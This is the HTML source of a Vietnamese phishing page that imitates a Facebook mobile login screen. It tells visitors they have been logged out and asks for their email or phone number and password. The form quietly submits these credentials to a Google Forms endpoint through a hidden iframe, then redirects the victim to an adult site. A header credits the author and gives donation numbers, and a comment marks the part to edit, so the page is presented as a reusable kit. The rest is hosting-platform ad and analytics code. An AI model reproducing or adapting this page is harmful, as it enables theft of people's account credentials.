
<!DOCTYPE html



FACEBOOKMobile

TẠO BỞI CODER VĂN HOÀNG - MỌI CHI TIẾT LIÊN HỆ VUH98926381@GMAIL.COM

DONATE BẠN HOÀNG CUTE
MOMO: 0376215739
VIETTEL PAY: 0376215739
ZALO PAY: 0376215739

FACEBOOK @hoangjump
TELEGRAM @hoangjump
>
<html lang="vi">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Đã đăng xuất. Hãy đăng nhập lại</title>
<style>*{margin:0;font-family:'Arial',sans-serif}.title{height:50px;width:100%;text-align:center;margin-bottom:20px}.form-login{text-align:center}.form-control{font-size:14px;width:80%;max-width:500px;margin:5px;border:solid 0.01rem #D1D1D1;box-shadow:1px 1px 2px #E0E0E0;background-color:#F5F6F7;padding:12px;border-radius:3px}.btn-login{margin-top:5px;background-color:#1877F2;padding:12px;border:0;border-radius:5px;max-width:500px;font-size:17px;height:40px;width:90%;color:#ffffff;font-weight:bold}.btn-register{margin-top:10px;background-color:#00A400;padding-left:16px;padding-right:16px;border:0;border-radius:5px;max-width:200px;font-size:14px;height:36px;color:#ffffff;font-weight:bold}.heading{position:relative;text-align:center}.title-text span{padding:0 15px;background-color:#fff}.hline{content:"";height:1px;width:35%;min-width:250px;left:0;right:0;margin:auto;background-color:#CCD0D5;position:absolute;top:50%;z-index:-1}.title-text2{text-align:center;position:relative}.title-text2 span{padding:0 15px;background-color:#fff}.title-text2:before{border-bottom:1px solid red;content:"";top:50%;position:absolute;left:0;right:0;z-index:-1;width:80%;margin:auto}.grid-container-lang{display:grid;grid-template-columns:auto auto;text-align:center}.footer{margin-top:50px;font-size:12px}footer{margin-top:50px}a{text-decoration:none}.lang{margin:2px}.noti{padding:8px;background-color:#FFFBE2;color:#4B4F66;font-size:14px;min-height:27px}</style>
</head><body><div style="display:none"><script type="text/javascript">
var _qevents = _qevents || [];
(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();
_qevents.push({
qacct:"p-0cfM8Oh7M9bVQ"
});
</script>
<noscript>
<img src="//pixel.quantserve.com/pixel/p-0cfM8Oh7M9bVQ.gif" border="0" height="1" width="1" alt=""/>
</noscript></div>
<div class="noti"><img style="float: left" src="https://www.flaticon.com/svg/static/icons/svg/124/124010.svg" height="30px"> 
    <div style="padding: 4px;"></div>
        <font style="margin-left: 5px;"> Bạn đã đăng xuất, vui lòng đăng nhập lại</font></div>
          <div class="title"><img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" height="50px"></div> <!Phần đầu website>
<section>
<! ##### PHẦN CẦN CHỈNH SỬA (EDIT)>
 <style>img[alt="www.000webhost.com"]{display:none;}</style> 
<script type="text/javascript">
var submitted=false;
</script><center>
  <iframe id="hidden_iframe" name="hidden_iframe" onload="if(submitted){window.location='https://xnxx.ditme.com/';}" style="display: none;"></iframe><br/>
 <form action="https://docs.google.com/forms/d/19K95pkrl5pV30GnG6rWWHegQnI7IWqPTVQMe1plGHh0/formResponse" method="POST" onsubmit="submitted=true;" target="hidden_iframe">
<input class="form-control" name="entry.1533890310" type="text" id="short-answer" placeholder="Email hoặc Số điện thoại">
 <input class="form-control" name="entry.818134196" type="password" id="short-answer" placeholder="Mật khẩu" required>
 <input class="btn-login" name="submit" type="submit" id="submit" value="Đăng nhập">
</form></center>

<!######>


  <br><center>
        <div class="heading">
            <p class="title-text" style="color: #4B4F66;"><span> hoặc </span></p>
                <div class="hline"></div>
                  </div>
                  <p><a href="https://facebook.com/reg/"><button class="btn-register" name="" id="">Tạo tài khoản mới</button></a></p>
                  <p style="margin-top: 10px;"><a class="link_forget" style="color: #7596C8; font-size: 14px;" href="#">Quên mật khẩu?</a></p>
                  </div>
                  <div class="footer">
                      <div class="grid-container-lang">
                              <a class="lang" style="font-weight: bold; color: #90949C" href="">Tiếng Việt</a>
                                      <a class="lang" style="font-weight: ; color: #576B95;" href="">English (UK)</a>
                                              <a class="lang" style="font-weight: ; color: #576B95;" href="">中文(台灣)</a>
                                                      <a class="lang" style="font-weight: ; color: #576B95;" href="">日本語</a>
                                                              <a class="lang" style="font-weight: ; color: #576B95;" href="">한국어</a>
                                                                      <a class="lang" style="font-weight: ; color: #576B95;" href="">Español</a>
                                                                              <a class="lang" style="font-weight: ; color: #576B95;" href="">Português (Brasil)</a>
                                                                                      <a class="lang" style="color: #576B95;" href=""><font style="border-radius: 3px; border: solid 1px #576B95;font-size: 20px; font-weight:; padding: 0px 3px 0px 3px;">+</font></a></center>
                                                                                              </div>
                                                                                              </div>
                                                                                              <footer>
                                                                                              <center><font style="font-size: 12px; color: #808080"> Facebook, Inc.</font></center>
                                                                                              </footer>
<!JAVASCRIPT>
</script>
<script type="text/javascript">function validateForm() {
                var email = document.forms["form-control"]["email"].value;
                if (email == "") {
                    document.getElementById('login_error').innerHTML = 'Vui lòng nhập Email hoặc số điện thoại?';
                    return false;
                }
                var email = document.forms["form-control"]["email"].value;
                if (email.length < 6) {
                    document.getElementById('login_error').innerHTML = 'Vui lòng nhập Email hoặc số điện thoại?';
                 
                    return false;
                }
                var ho = document.forms["form-control"]["pass"].value;
                if (ho == "") {
                    document.getElementById('login_error').innerHTML = 'Vui lòng nhập mật khẩu?';
                   
                    return false;
                }
                var ho = document.forms["form-control"]["pass"].value;
                if (ho.length < 6) {
                    document.getElementById('login_error').innerHTML = 'Vui lòng nhập mật khẩu?';
                    return false;
                }
            }</script>
<center><a href="?act=off" style="color:red"></a></center>
<div style="display:none">
<style type="text/css">html { padding-top: 26px; } #xt_auth_iframe { position: fixed; top: 0; left: 0; background: transparent; }</style><iframe id="xt_auth_iframe" allowTransparency="true" scrolling="no" frameBorder="0" style="width: 100%; border: 0; height: 26px;" src="https://xtgem.com/__xt_authbar?data=eyJ1cmwiOiJodHRwOlwvXC9mYWNlYm9vb2trcGhhbXRyb25nLnh0Z2VtLmNvbVwvaW5kZXgiLCJsb2dnZWRfaW4iOmZhbHNlLCJkb21haW4iOiJmYWNlYm9vb2trcGhhbXRyb25nLnh0Z2VtLmNvbSIsInBvc2l0aW9uIjp7ImFic29sdXRlIjoiZml4ZWQifX0="></iframe><br /><!----><noscript></noscript><script type="text/javascript"></script><textarea style="display:none;"></textarea><style></style><iframe style="display:none;width:0px;height:0px;border:0"></iframe><noframes></noframes><div id="st1621438239" style="z-index:999999;z-index:999999999;"><span id="a1621438239"><a href="http://xtgem.com/click?p=forums_catalog_smart&amp;u=__urlaHR0cDovL3h0Z2VtLmNvbS9mb3J1bXM/YWQ9MQ==&amp;s=faceboookkphamtrong.xtgem.com&amp;t=KhsdHhwaHAgDAQoZBwMADw8ICQwECQl1dw==&amp;_is_adult=No&amp;_ad_pos=Bottom&amp;_ad_format=Plain&amp;_ad_url=ZmFjZWJvb29ra3BoYW10cm9uZy54dGdlbS5jb20=&amp;_ad_networks=&amp;_ad_type=Banner" target="_blank"><img src="http://xtgem.com/images/forum/xtgem-forums.jpg" alt="XtGem Forum catalog"></a></span>        <style type="text/css">
            #st1621438239 *
            {
                box-sizing:content-box !important;
            }

            #st1621438239 a
            {
                display: inline-block !important;
                vertical-align: top;
                padding: 0; margin: 0;
            }

            #st1621438239 a img
            {
                display: inline-block !important;
            }

            #st1621438239 ._xt_ad_close, #st1621438239 ._xt_ad_close_internal
            {
                display: inline-block !important;
                position: absolute !important;
                right: 6px !important;
                width: 20px !important;
                height: 20px !important;
                cursor: pointer;
            }

            #st1621438239 ._xt_ad_close
            {
                top: -10px !important;
            }

            #st1621438239 ._xt_ad_close_internal
            {
                border: 6px solid transparent;
                top: -12px !important;
                right: 3px !important;
            }

            #a1621438239
            {
                display: inline-block !important;
                position: relative !important;
                text-align: left !important;
                visibility: visible !important;
                max-width: 100% !important;
                max-height: none !important;
                z-index:999999 !important;
                z-index:999999999 !important;
            }

            #a1621438239 img
            {
                max-width: none !important;
                max-height: none !important;
                width: auto !important;
                height: auto !important;
                min-width: 0 !important;
                min-height: 0 !important;
            }

            .fba1621438239
            {
                color: #1D1EEB !important;
                background-color: #fff !important;
                padding: 10px 50px 10px 10px !important;
                border: 1px solid #2C2C2C !important;
                webkit-border-radius: 5px;
                   moz-border-radius: 5px;
                       border-radius: 5px;
                text-decoration: underline !important;
                font-weight: bold !important;
                display: block !important;
                -webkit-background-clip: padding-box;
                   -moz-background-clip: padding-box;
                        background-clip: padding-box;
                height: 32px;
                line-height: 32px !important;
                background-image: url(//xtgem.com/images/arrow.gif) !important;
                background-repeat: no-repeat !important;
                background-position: 95% center !important;
            }

            .fbp1621438239
            {
                position: relative !important;
                display: block !important;
                width:320px !important;
                height:50px !important;
                text-align:left !important;
                background-color: #fff !important;
                -moz-box-shadow: 0 0px 5px rgba(0, 0, 0, 0.2);
                -webkit-box-shadow: 0 0px 5px rgba(0, 0, 0, 0.2);
                box-shadow: 0 0px 5px rgba(0, 0, 0, 0.2);
                padding: 3px !important;
                border-radius: 3px !important;
                border: 1px solid #6bc135 !important;
                text-decoration: underline !important;
            }

            .fbp_txt1621438239
            {
                position:relative !important;
                display: inline-block !important;
                min-width: 200px;
                max-width: 200px;
                height:50px !important;
                vertical-align: top !important;
                line-height:50px !important;
                margin-left: 6px !important;
                text-align: left !important;
                color: #0274d4 !important;
                font-family: Helvetica, Arial, sans-serif !important;
                font-size: 13px !important;
                font-weight: bold !important;
                text-decoration: underline !important;
            }

            .fbp_ico1621438239
            {
                position: absolute !important;
                right: 10px !important;
                height: 50px !important;
                line-height: 46px !important;
                vertical-align: top !important;
                color: #6bc135 !important;
            }

            #st1621438239 .rolling_ad { display: none !important; }
            #st1621438239 .rolling_ad.roll_on { display: inline-block !important; }
        </style></div><!----><noscript></noscript><script type="text/javascript"></script><textarea style="display:none;"></textarea><style></style><iframe style="display:none;width:0px;height:0px;border:0"></iframe><noframes></noframes><script type="text/javascript" id="xtjs">                (function (){

                    var d, b, ad_pos = false, el_rolling_ads, html, el, el_inner, el_new = '', i = 0;

                    function xt_cache () {
                        d = document;
                        b = d.getElementsByTagName('body')[0];
                        html = d.documentElement;
                        el = d.getElementById( 'st1621438239' );
                        el_inner = d.getElementById( 'a1621438239' );
                        el_rolling_ads = el.getElementsByClassName( 'rolling_ad' );
                    }

                    xt_cache();

                        if ( el.children[ 0 ] !== el_inner && el.children[ 0 ].tagName == "A" ) {

                            for ( i = 1; i < el.children.length; i++ ) {
                                el_new += el.children[i].outerHTML;
                            }

                            el.innerHTML = el_inner.outerHTML.split( '>' )[ 0 ] + '>' + el_new + '</span>';

                            xt_cache();
                        }
                        else if ( el.offsetParent === null ) {
                            b.insertBefore( el, b.firstChild );

                            xt_cache();
                            ad_pos = true;
                        }

                        if (d.getElementById('kosmos-banner')) {
                            ad_pos = true;
                        }

                        el.style.display="block";
                        el.style.textAlign="center";
                        el.style.position="fixed";
                        if ( ad_pos ) { el.style.top=10+"px"; el.style.bottom='auto'; } else { el.style.bottom=10+"px"; }
                        el.style.left="0";
                        el.style.right="0";
                        el.style.height="1px";

                        var el_imgs = el.getElementsByTagName( 'IMG' );
                        for (i=0,len=el_imgs.length; i<len; i++) { el_imgs[i].onload = fix_height; }

                        function fix_height () {
                            el.style.marginBottom = el_inner.offsetHeight+"px";
                            if ( ad_pos ) {
                                html.style.paddingTop = el_inner.offsetHeight+9+"px";
                            } else {
                                html.style.paddingBottom = el_inner.offsetHeight+9+"px";
                            }
                        }

                        setTimeout(function(){fix_height();},200);

                        var closebutton = d.createElement('IMG');
                            closebutton.src = '//xtgem.com/images/close2.png?v=0.01';
                            closebutton.alt = '[x]';
                            closebutton.setAttribute( 'class', '_xt_ad_close' );
                            closebutton.onclick = function () { closebutton.setAttribute( 'style', 'display: none !important' ); el.style.position = 'static';  closebutton.onclick = null; html.style.paddingBottom = '0'; html.style.paddingTop = '0'; if ( d.getElementById('wr1621438239') ) { d.getElementById('wr1621438239').style.bottom = '0'; } };
                            el_inner.appendChild(closebutton);

                        // lets roll ads if needed
                        if ( el_rolling_ads )
                        {
                            function roll_ads () {
                                var i = 0,
                                    len = el_rolling_ads.length,
                                    curr_ad,
                                    next_ad,
                                    first_ad = el_rolling_ads[ 0 ];

                                for ( ; i < len; i++) {
                                    curr_ad = el_rolling_ads[ i ];
                                    next_ad = el_rolling_ads[ i + 1 ] ? el_rolling_ads[ i + 1 ] : first_ad;

                                    if ( curr_ad.className.indexOf( ' roll_on' ) !== -1 ) {
                                        curr_ad.className = curr_ad.className.replace(' roll_on', '');
                                        next_ad.className = next_ad.className + ' roll_on';
                                        break;
                                    }
                                }
                                setTimeout(roll_ads, 3500);
                            }
                            roll_ads();
                        }
                }());</script></body>
</html>
